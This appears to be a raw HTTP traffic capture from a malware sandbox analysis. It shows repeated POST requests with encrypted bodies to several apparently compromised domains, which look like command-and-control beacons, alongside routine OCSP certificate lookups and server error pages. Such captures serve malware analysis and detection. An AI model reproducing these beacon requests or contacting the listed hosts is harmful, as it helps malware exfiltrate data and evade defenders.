5e2e..0...!0.......0...*.H........0r1.0...U....US1.0...U....TX1.0...U.
...Houston1.0...U....cPanel, Inc.1-0 ..U...$cPanel, Inc. Certification
Authority..170630132212Z..170704132212Z0...-0"....{.|.k.....C......16
0626040357Z0".........kqU'P...vD..160626063802Z0!..9...m..Q).r.......1
60626094731Z0!..R[.....{......`\..160626104205Z0!...JQz"..@..l.......1
60626111101Z0".....;.....p..>...}..160626114524Z0!..Z........4p.GY.
..160626131509Z0!....1.....w.<..'.\..160626135106Z0!......e/G.....
......160626143101Z0".....#...y.O(hF>..A..160626151422Z0!..7".d....
..T2......160626162744Z0!.....:b...l...:g.p..160626164758Z0"..../.j...
....p .....160626172753Z0".........<..F[.&..'..160626180829Z0!...PG
.!.P1A.........160626182706Z0!.. G....L.b......f..160626205225Z0!..?..
.....I.....\...160626232528Z0!..Q.N%.]............160627005502Z0"....g
./9.....0)......160627012409Z0"......Ts..........X..160627012801Z0"...
..X.6.J...........160627015425Z0!....x7.y...CI<..&o..160627020940Z0
".....>...Z..w.U......160627033649Z0 ..u.t..............16062703423
7Z0"........c.....3|.....160627044010Z0"....8..A..$..<....L..160627
055426Z0!....l.D...qFg.2."...160627060107Z0".....kAHYz...........16062
7062620Z0"....e..W...U.y..jX...160627083920Z0".........I.^..Z......160
627084223Z0"....P.F.{\._m%@)..'..160627091234Z0!...P6.&$=;.2..../...16
0627093808Z0"....P.(..........),..160627093927Z0".......u......'.D....
160627100829Z0!..D...s=x...p%..`...160627111101Z0"....b..7.y.{.bØ...
.160627112019Z0"....t.....X.]?j...`..160627114832Z0"......d..|pY/.

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: genmar.gen.tr
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __cfduid=dec2cd68baee90387d3b90d9ad5a9c8c21498907821

U1iqmp0toozaSbcB1NIsc9azHHxLzb5WIXAyvo2bBmOKIVi/ 5H VKm6jE1gX1nar9UijYFjYgpVdqLHl3WeaZmutGT36A57BFxv0BaoqoGm GFt yisLkgAE8hNMRVPVEVzrsQbAy YsF6DXYXbIhGlmXxlbz2FFGPrVUmxZ8v1EFpfn9 gGkajZi73fMGUu0s DTqmmlX4vwf43r9 b4b6lbPJmE3gyN8tDQhzTpyLiufHLG8l Sm1nLDGMMt2 C1ie1Xl2p628eKXr7RVnoio7RmBwnv2E4r5NFQA96MxPxcyJVH1EkcFaKkt/lip5QceoaBfxCRmvXRCBM2Ok2zRe3xSRH9vRJ3yGAL4xQ3aA/cZs581djqXZpwGxXSgNXFo/PHmdy9sOjIgO6nPbYj PWD8niTohAGAGUNOuMJQk5xcg c6X5S6wRxoxXO0lGU9Azi5q6r96gon2/1wTYUDPPixLg==
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f59f80bd842a-KBP
10f0..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 464
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: freepatentauction.com
Connection: Keep-Alive
Cache-Control: no-cache

okgkQn6HQG2me7TISQgAumHhKo0 15SykmdWP2SJERaWHc/HEPVEZGbFaOr2oxYOLfQrPhYZjS9Tgo4pnpEZjptHnLaTS35Lb1fiD8HdpbgrQHu3wEVp60wX9jD1KQPFcI ESJvwPUR0gZJXm79BdKUYoSLFU5jnLutOci6IJ9tOrDsVp96YZbx75kAkP4RjviIwhpZ4FoUOE3gKnQALWrDMBWFv2r4 em5S/vMBqAZpVE2NRtTrnQaP7ZBX4mo42ideM xgQKC9I9yLttutXxIzEkROXAxc1UVLHlo27IJ5SNYiAWAh5bRHpxeQwOFXcGuFupLBDPrxuwvFkvW6bYNrDIgY2X2wWdehFj8E7/3K45JTeZZ7xml4B5BDgQCnUkrNIwP4nEolizpp7vLXomxcGefqFlVZw2hCCNXwKSdhFNJhCgbzgkgns82fLWQY esQnJ0jTOTHLQ==
HTTP/1.1 301 Moved Permanently
Set-Cookie: 240planBAK=R2339298881; path=/; expires=Sat, 01-Jul-2017 12:29:17 GMT
Date: Sat, 01 Jul 2017 11:16:56 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 237
Set-Cookie: 240plan=R3762668425; path=/; expires=Sat, 01-Jul-2017 12:25:27 GMT
Server: Apache
Location: hXXp://VVV.patentauction.com/
Vary: Accept-Encoding
X-IPLB-Instance: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.patentauction.com/">here&l
t;/a>.</p>.</body></html>.HTTP/1.1 301 Moved Perm
anently..Set-Cookie: 240planBAK=R2339298881; path=/; expires=Sat, 01-J
ul-2017 12:29:17 GMT..Date: Sat, 01 Jul 2017 11:16:56 GMT..Content-Typ
e: text/html; charset=iso-8859-1..Content-Length: 237..Set-Cookie: 240
plan=R3762668425; path=/; expires=Sat, 01-Jul-2017 12:25:27 GMT..Serve
r: Apache..Location: hXXp://VVV.patentauction.com/..Vary: Accept-Encod
ing..X-IPLB-Instance: 341..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML
2.0//EN">.<html><head>.<title>301 Moved Permanen
tly</title>.</head><body>.<h1>Moved Permanentl
y</h1>.<p>The document has moved <a href="hXXp://VVV.pa
tentauction.com/">here</a>.</p>.</body></html&
gt;...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 456
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mastergrp-spb.ru
Connection: Keep-Alive
Cache-Control: no-cache

FfILThls635gjYP KGbmCbKDC5B3syzNXbit9T/kUNX72WC QNGuzi5yDEcv5mHsjyoPquB6McC3I0y84IbnmdD BzTTLPCby/PzCcX0PdFxQSapqIkjxjWsjA0aWfrz4ASxB8WyV7uiUCEsFAiByDRfcF XEL4ZRe1w4QjHSQEyqcJDkQWFSovnAUPaCDGA0pMWXWQQLBVxJnxXxR9/X6nVX2gWEnfhUJs7zUZZm9umCrcjHpFZ6sRHi4buzMlMqxSH2l9cGuEIgT0z 2x7CtXA wgygwLTVFJkIHTR0vtFCcr2AATCls Cb3Q4/hTttCmKP5NIZkdLSBw/lyyEYUcLgv2yClOSweweCNA4EDwlcjMn/18uPXqljPc2EiivP5t r8hMYMqerXUG6MqYZNTXxj42A pfaIh7ufiKEbyv6eu9U/OQVFH57x1o9j8hCK7jAkJ4
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 01 Jul 2017 11:17:17 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>403 Forbidden</title><
/head>..<body bgcolor="white">..<center><h1>403 F
orbidden</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
03 Forbidden..Server: nginx..Date: Sat, 01 Jul 2017 11:17:17 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>403 Forbidden</title></hea
d>..<body bgcolor="white">..<center><h1>403 Forbi
dden</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
disable MSIE and Chrome friendly error page -->..<!-- a padding
to disable MSIE and Chrome friendly error page -->..
...

<<< skipped >>>

POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 532
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mastergrp-spb.ru
Connection: Keep-Alive
Cache-Control: no-cache

hc4OMoa8D4u7Bn5Goepu qnHwwPmhIi7GqFWc5HPYDmlAnCuFuYfMSfgNQt qw5nrx7zs1SdICDH2Y8bjMKl k1t3d44lIz4k0XjkUbWYObbGzm8ENHXBXOSO OXrT1BxyELoCMOhOrsHg19kb7AQA/cZl5i1iA8ZF1Md4ymHuxsWRPfUuQNqpstIGWXn9fK19sbVXYELp73dDGQ pkEZt8QUFBqpNEDqlRPDuvwnKqWjp8geosGV7TsKQnv4tSlTd1U7BYARcEY1rvJq0CeBkgXWQfcoaSdxoMPmBIEzcW8bJCv0SqkTCqpz5B6PdcpeEv7FdMy7F4YEF7IVNirvwLjfJlW1fE52GpxdSXfGMMPyi1jy H0Uqil3eYxxJaUDypehp2KWNZc4AWCeuFVAY7upKXBriZOJ/ MiMwJLd65pN7Pc44ens9uGehVqwXyUC6mZUyzk73hGs8p C6ljLVGbhG5H5hp0F2VzJoebV6QZSbqZ25xAJ5vd5m1hjlGQNr5cBPu6 r0GlUv/A==
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 01 Jul 2017 11:17:31 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>403 Forbidden</title><
/head>..<body bgcolor="white">..<center><h1>403 F
orbidden</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
03 Forbidden..Server: nginx..Date: Sat, 01 Jul 2017 11:17:31 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>403 Forbidden</title></hea
d>..<body bgcolor="white">..<center><h1>403 Forbi
dden</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
disable MSIE and Chrome friendly error page -->..<!-- a padding
to disable MSIE and Chrome friendly error page -->....

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: pbna.com
Connection: Keep-Alive
Cache-Control: no-cache

RZ8GB2dmM3Vje7QQFjDnqjDFk8bd/hani AsdG6fGCx5f3c4hiBb4HMeYOxeSu2//jPGUG5izknp6VyvwRCYzQ/0sNvr2n1v6uKcr7XJzn6ZBfLMw/qV8ByS3pz1O5wtzON/g6hyDHZfkBBVzKJD5RPmX5Vnpn7a9XtOAlO/t2KiNutgydtRjwUL9Kaaz1sxry7jfvUbIB8Zyt4e2QzXKnbzwbAFt5u1swWqhlABM8XbvWzvrwohxS5QwNbegHgbNmyyljCbHvdEsqpEqM3ufOWFlnlP1GVw5N2YF5dNZSfZSXwFYL9GEOG7kUFITb5I9dqeo1AXpr2I2FRJPswMcfc/UEw8gwuDyHwc6LYLFqYchkLqYMViFlTvE8/Jbzp0mVCOWqjnOkUHA3lojiQsRRR LVDTmekfhigbCefQvtY1F jvhFdetilmGQtuROrxFs3eSE4GVVyYnHxkvTox0N/YJfNg2DhLEQ==
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:05 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=deb631db9f41c40d71ab58173ae50b8871498907825; expires=Sun, 01-Jul-18 11:17:05 GMT; path=/; domain=.pbna.com; HttpOnly
Server: cloudflare-nginx
CF-RAY: 3778f4f440a48448-KBP
d1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html&
gt;<head>.<title>403 Forbidden</title>.</head>
<body>.<h1>Forbidden</h1>.<p>You don't have pe
rmission to access /.on this server.<br />.</p>.</body&
gt;</html>...0..HTTP/1.1 403 Forbidden..Date: Sat, 01 Jul 2017 1
1:17:05 GMT..Content-Type: text/html; charset=iso-8859-1..Transfer-Enc
oding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=deb631db9
f41c40d71ab58173ae50b8871498907825; expires=Sun, 01-Jul-18 11:17:05 GM
T; path=/; domain=.pbna.com; HttpOnly..Server: cloudflare-nginx..CF-RA
Y: 3778f4f440a48448-KBP..d1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HT
ML 2.0//EN">.<html><head>.<title>403 Forbidden<
;/title>.</head><body>.<h1>Forbidden</h1>.&
lt;p>You don't have permission to access /.on this server.<br /&
gt;.</p>.</body></html>...0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 456
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mastechn.com
Connection: Keep-Alive
Cache-Control: no-cache

xxxxQ1e8cGzYRKx5Ri2yDaDAc2WNk5SEeyXl5IRH4xQ20mSQ VdX5UEeW4oWKyExyiscOavG8dvgiaegyN hUlkqLVeySvz8jJpB/T0d7XwisxdRqmhpWgecoBF8HE/tWQ5Bsk7SBWjaxDRC7loyiq3WCgemJ nZpB2y48oJFiN/bzB9Wp83qV0VrV38J4t864O1cqn0/zWrCIv8sjrkjuH5R1Y0aAocLTfta2KzDkQcT 21Rxg8l08xVONWdJ8ymo7JbteEQXXfWtfI3y34lnPHtst /yzLoEVedcIopNsdzwLVbRVa7hXUMNd1o9pxhXogTcERhivjFT/NyhyJIwy6/GaN5zWLo995NN KtCXGO4qTwpyfVKdh8KVcpn1acQAUEJdgEHXmJmh3okKGVH8 5QcxyU2p3S07BGH1mgUJUsfVnqHDScUBw Vs1rSVyZKNow==
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:16:55 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PleskLin
Content-Length: 5043
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "hXXp://VVV.w3.or
g/TR/xhtml11/DTD/xhtml11.dtd">..<head>...<title>Apache
HTTP Server Test Page powered by CentOS</title>...<meta http-
equiv="Content-Type" content="text/html; charset=UTF-8" />...<st
yle type="text/css">....body {.....background-color: #fff;.....colo
r: #000;.....font-size: 0.9em;.....font-family: sans-serif,helvetica;.
....margin: 0;.....padding: 0;....}....:link {.....color: #0000FF;....
}....:visited {.....color: #0000FF;....}....a:hover {.....color: #3399
FF;....}....h1 {.....text-align: center;.....margin: 0;.....padding: 0
.6em 2em 0.4em;.....background-color: #3399FF;.....color: #ffffff;....
.font-weight: normal;.....font-size: 1.75em;.....border-bottom: 2px so
lid #000;....}....h1 strong {.....font-weight: bold;....}....h2 {.....
font-size: 1.1em;.....font-weight: bold;....}.....content {.....paddin
g: 1em 5em;....}.....content-columns {...../* Setting relative positio
ning allows for .....absolute positioning for sub-classes */.....posit
ion: relative;.....padding-top: 1em;....}.....content-column-left {...
../* Value for IE/Win; will be overwritten for other browsers */.....w
idth: 47%;.....padding-right: 3%;.....float: left;.....padding-bottom:
2em;....}.....content-column-right {...../* Values for IE/Win; will b
e overwritten for other browsers */.....width: 47%;.....padding-left:
3%;.....float: left;.....padding-bottom: 2em;....}.....content-columns
>.content-column-left, .content-columns>.content-column-righ

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 448
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: coopsupermarkt.nl
Connection: Keep-Alive
Cache-Control: no-cache

ERYLA4QEMWorwgSun8acmVeWK9i81yUQ Fkz0rn Y3haM/BBB0 9rawJFXGmY  GZoRjpm7CquWZhaPCiVC62g/kpQMLrv/EuB6AvEhEmZZWkHsd 8f1CqoAlVUGLJRli5SaxKWbwzFKep7vq9jcCamRYxgn8UeH0 mZ5sfQ2t9dO3Vd5SClpcYQ1Uww1OrtntrCU4PwJLMcDDK5haynz1LYL9CRqQIPezXROM1V4Opodni3xWDhil7ihi96XDUSTwSnY4gryuFH0VEk55zLaoJLNn6Kj9PgfY4/hE6Bzu1gwEY06tsOp2/qmvHKDgrVrQCGzXhHbIGeesaEaxdkUSQNCCQVje0lxOMP96V3w1JxjaElZTBbepFht9qdmdEkjlAHzPkALYyG8SR44uFuwue5GjsOkc0mQ9WJl2yJqqOFSaCRmJ0ORrAYZscEKQ==
HTTP/1.1 302 Found
Date: Sat, 01 Jul 2017 11:16:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=vjocrc3b0q6hrkfs28n0uta514; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: nl
Location: hXXp://coop.nl
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


GET //MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgPbE+K+a6P2SuOky80Zou2a1g== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "5424B51E6D20334B0ED8D947793AF5BBA0AFFDD9FB16D6FB9FDFFF853230AF67"
Last-Modified: Fri, 30 Jun 2017 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=22182
Expires: Sat, 01 Jul 2017 17:26:39 GMT
Date: Sat, 01 Jul 2017 11:16:57 GMT
Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170630205600Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee............k..J......
.......20170630200000Z....20170707200000Z0...*.H.............- ..e....
.1......;R.<.O...-N.1.V.T.%.z"^....3.{7R2RTv...5:.8.9.............[
....M..NB.~..*.U.[wX.<......Sam..D.....)5....p.....R.v#..C{...RMB.N
.c0G.......3|..e.4....&v[.>.HH\m....e...R.Ai.j....J4!.b..|[..f.ar..
..$.0....ho. ..Hj....>!......<.T".!S......ni.rHTTP/1.1 200 OK..S
erver: nginx..Content-Type: application/ocsp-response..Content-Length:
527..ETag: "5424B51E6D20334B0ED8D947793AF5BBA0AFFDD9FB16D6FB9FDFFF853
230AF67"..Last-Modified: Fri, 30 Jun 2017 20:00:00 UTC..Cache-Control:
public, no-transform, must-revalidate, max-age=22182..Expires: Sat, 0
1 Jul 2017 17:26:39 GMT..Date: Sat, 01 Jul 2017 11:16:57 GMT..Connecti
on: keep-alive..0..........0..... .....0......0...0...L0J1.0...U....US
1.0...U....Let's Encrypt1#0!..U....Let's Encrypt Authority X3..2017063
0205600Z0u0s0K0... ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee......
......k..J.............20170630200000Z....20170707200000Z0...*.H......
.......- ..e.....1......;R.<.O...-N.1.V.T.%.z"^....3.{7R2RTv...5:.8
.9.............[....M..NB.~..*.U.[wX.<......Sam..D.....)5....p.....
R.v#..C{...RMB.N.c0G.......3|..e.4....&v[.>.HH\m....e...R.Ai.j....J
4!.b..|[..f.ar....$.0....ho. ..Hj....>!......<.T".!S......ni.rfont>....

<<< skipped >>>

GET //MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgMpdqqzEgO0NFh6jhwxp60Osw== HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "74D80302BFECB5221C4973DDCB4E9AAEC189E63687B1AED1F0176A771FC73E8A"
Last-Modified: Fri, 30 Jun 2017 08:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=7155
Expires: Sat, 01 Jul 2017 13:16:12 GMT
Date: Sat, 01 Jul 2017 11:16:57 GMT
Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170630084800Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........)v.....4Xz..1.
.......20170630080000Z....20170707080000Z0...*.H.............m....Z_..
;.Y.#....]h#5y.f.5w......i......VU..)pEM..h3..q`......a_.....%t.;"9.J.
..s..!.,u...........[...w;..6.W.G.F\...Q...R.@ ........^s.M.1..<}q.
...l9.;.....C.............Yx6....YYXf....i.....J.<.3E.4-Nie_....T..
FS._A...4.....b/=....IR.|.@505....9..Y>....HTTP/1.1 200 OK..Server:
nginx..Content-Type: application/ocsp-response..Content-Length: 527..
ETag: "74D80302BFECB5221C4973DDCB4E9AAEC189E63687B1AED1F0176A771FC73E8
A"..Last-Modified: Fri, 30 Jun 2017 08:00:00 UTC..Cache-Control: publi
c, no-transform, must-revalidate, max-age=7155..Expires: Sat, 01 Jul 2
017 13:16:12 GMT..Date: Sat, 01 Jul 2017 11:16:57 GMT..Connection: kee
p-alive..0..........0..... .....0......0...0...L0J1.0...U....US1.0...U
....Let's Encrypt1#0!..U....Let's Encrypt Authority X3..20170630084800
Z0u0s0K0... ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........)v...
..4Xz..1........20170630080000Z....20170707080000Z0...*.H.............
m....Z_..;.Y.#....]h#5y.f.5w......i......VU..)pEM..h3..q`......a_.....
%t.;"9.J...s..!.,u...........[...w;..6.W.G.F\...Q...R.@ ........^s.M.1
..<}q....l9.;.....C.............Yx6....YYXf....i.....J.<.3E.4-Ni
e_....T..FS._A...4.....b/=....IR.|.@505....9..Y>....
....

<<< skipped >>>

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgOO0HAZOuLU2YD9GjtB7kQKIg== HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "CEECC055960C22A16FD853808012B964F0BF3E16032CB1FD2CCFA7ADC41D8F6B"
Last-Modified: Thu, 29 Jun 2017 12:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6790
Expires: Sat, 01 Jul 2017 13:10:08 GMT
Date: Sat, 01 Jul 2017 11:16:58 GMT
Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170629125500Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee..........p.:......;A.
D."....20170629120000Z....20170706120000Z0...*.H......................
?Q-...I.:..V......cT/-E.f.b).~'.O'M....T..`......P.}3d...e.P.nn.t.....
.Q..gS.p...w. ...M........Z..;.....6L_0#..w]......../h1=.)l~..v.....=.
C....y.V..0..:..|E"}.b........c..y....9.....i/pU.z..X..,.:..~..#..X..4
UY.X.Q.6.U....O... .Gi......k.!...J..HTTP/1.1 200 OK..Server: nginx..C
ontent-Type: application/ocsp-response..Content-Length: 527..ETag: "CE
ECC055960C22A16FD853808012B964F0BF3E16032CB1FD2CCFA7ADC41D8F6B"..Last-
Modified: Thu, 29 Jun 2017 12:00:00 UTC..Cache-Control: public, no-tra
nsform, must-revalidate, max-age=6790..Expires: Sat, 01 Jul 2017 13:10
:08 GMT..Date: Sat, 01 Jul 2017 11:16:58 GMT..Connection: keep-alive..
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170629125500Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee..........p.:......;A.
D."....20170629120000Z....20170706120000Z0...*.H......................
?Q-...I.:..V......cT/-E.f.b).~'.O'M....T..`......P.}3d...e.P.nn.t.....
.Q..gS.p...w. ...M........Z..;.....6L_0#..w]......../h1=.)l~..v.....=.
C....y.V..0..:..|E"}.b........c..y....9.....i/pU.z..X..,.:..~..#..X..4
UY.X.Q.6.U....O... .Gi......k.!...J..
....

<<< skipped >>>

GET //MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgM8VK+L+sAJyPXN62OPRwOgbA== HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "FA56DEEBACAE8A5204B7D314550DB47A23869E772F9084D3FBFCFFBFB5404C5C"
Last-Modified: Fri, 30 Jun 2017 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2034
Expires: Sat, 01 Jul 2017 11:50:55 GMT
Date: Sat, 01 Jul 2017 11:17:01 GMT
Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170630210200Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........<T.........
c.G..l....20170630210000Z....20170707210000Z0...*.H................OO!
..........(*b...B./......W.G../.s ;..'...jzi?.#.X@cFc..j....I.?....pA.
...........W..b....Y'.6a.b.....'v..DEo@...?.2*O.v......C.),@..?...>
#q.GJ.....E..oV.r.3l v.NS.....{....T^..$1.f.a^D1.....l.......4..&b..)*
.ST..h.R.N/r.xs.5.TsOL*.l....i.M.GUG..}[6.eHTTP/1.1 200 OK..Server: ng
inx..Content-Type: application/ocsp-response..Content-Length: 527..ETa
g: "FA56DEEBACAE8A5204B7D314550DB47A23869E772F9084D3FBFCFFBFB5404C5C".
.Last-Modified: Fri, 30 Jun 2017 21:00:00 UTC..Cache-Control: public,
no-transform, must-revalidate, max-age=2034..Expires: Sat, 01 Jul 2017
11:50:55 GMT..Date: Sat, 01 Jul 2017 11:17:01 GMT..Connection: keep-a
live..0..........0..... .....0......0...0...L0J1.0...U....US1.0...U...
.Let's Encrypt1#0!..U....Let's Encrypt Authority X3..20170630210200Z0u
0s0K0... ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........<T...
......c.G..l....20170630210000Z....20170707210000Z0...*.H.............
...OO!..........(*b...B./......W.G../.s ;..'...jzi?.#.X@cFc..j....I.?.
...pA............W..b....Y'.6a.b.....'v..DEo@...?.2*O.v......C.),@..?.
..>#q.GJ.....E..oV.r.3l v.NS.....{....T^..$1.f.a^D1.....l.......4..
&b..)*.ST..h.R.N/r.xs.5.TsOL*.l....i.M.GUG..}[6.e
....

<<< skipped >>>

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgM/WaVueegEX1FOlwMTTOvxGQ== HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
